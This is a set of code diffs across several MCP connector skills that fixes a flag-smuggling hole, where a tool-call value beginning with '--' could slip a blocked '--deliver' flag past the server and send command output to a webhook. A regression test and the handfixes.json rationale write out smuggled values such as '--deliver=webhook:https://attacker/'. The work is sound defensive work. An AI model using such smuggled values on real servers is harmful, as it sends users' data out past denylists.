      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/wordpress/CHANGELOG.md
+++ b/skills/wordpress/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-08-26
 

--- a/skills/wordpress/CHANGELOG.md
+++ b/skills/wordpress/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.4]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.3] - 2026-08-26
 
 ### Fixed

--- a/skills/wordpress/CHANGELOG.md
+++ b/skills/wordpress/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-08-26

--- a/skills/wordpress/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/wordpress/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/wordpress/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/wordpress/cli/internal/mcp/cobratree/shellout.go
@@ -272,6 +272,13 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -281,10 +288,10 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -292,11 +299,11 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/wordpress/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/wordpress/cli/internal/mcp/cobratree/shellout_test.go
@@ -84,7 +84,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"profile":  true,
 		"token":    true,
 	})
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -113,7 +113,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in, map[string]bool{"args": true})
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -146,7 +146,7 @@ func TestBlockedStructuredArgsOnlyDropsInheritedRootFlags(t *testing.T) {
 		"config":  "/tmp/evil.yaml",
 		"json":    "true",
 	}, blocked)
-	want := []string{"--json", "true", "--profile", "local-profile"}
+	want := []string{"--json=true", "--profile=local-profile"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP command-aware blocklist: got %v, want %v", got, want)
 	}
@@ -364,7 +364,7 @@ func TestCLIArgsFromMCPSkipsStructuredPositionals(t *testing.T) {
 		"id":       "123",
 		"format":   "json",
 	}, blocked)
-	want := []string{"--format", "json"}
+	want := []string{"--format=json"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP forwarded positionals as flags: got %v, want %v", got, want)
 	}
@@ -528,4 +528,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled}, blockedRootFlags)
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/wordpress/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/wordpress/cli/internal/mcp/cobratree/shellout_test.go
@@ -589,15 +589,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args, blockedRootFlags)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/wordpress/handfixes.json
+++ b/skills/wordpress/handfixes.json
@@ -151,6 +151,35 @@
      "not_contains": "t.Skip(\"bearer-style credential test incompatible"
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/wordpress/handfixes.json
+++ b/skills/wordpress/handfixes.json
@@ -166,8 +166,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -177,7 +189,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/xero/CHANGELOG.md
+++ b/skills/xero/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-09-01
 

--- a/skills/xero/CHANGELOG.md
+++ b/skills/xero/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-09-01

--- a/skills/xero/CHANGELOG.md
+++ b/skills/xero/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.5]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.4] - 2026-09-01
 
 _Version 0.1.3 was never published. Its GitHub release was created empty by a release-pipeline

--- a/skills/xero/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/xero/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/xero/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/xero/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/xero/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/xero/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/xero/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/xero/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/xero/handfixes.json
+++ b/skills/xero/handfixes.json
@@ -340,8 +340,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -351,7 +363,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/xero/handfixes.json
+++ b/skills/xero/handfixes.json
@@ -325,6 +325,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/zammad/CHANGELOG.md
+++ b/skills/zammad/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.5]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.4] - 2026-09-01
 
 ### Fixed

--- a/skills/zammad/CHANGELOG.md
+++ b/skills/zammad/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-09-01
 

--- a/skills/zammad/CHANGELOG.md
+++ b/skills/zammad/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
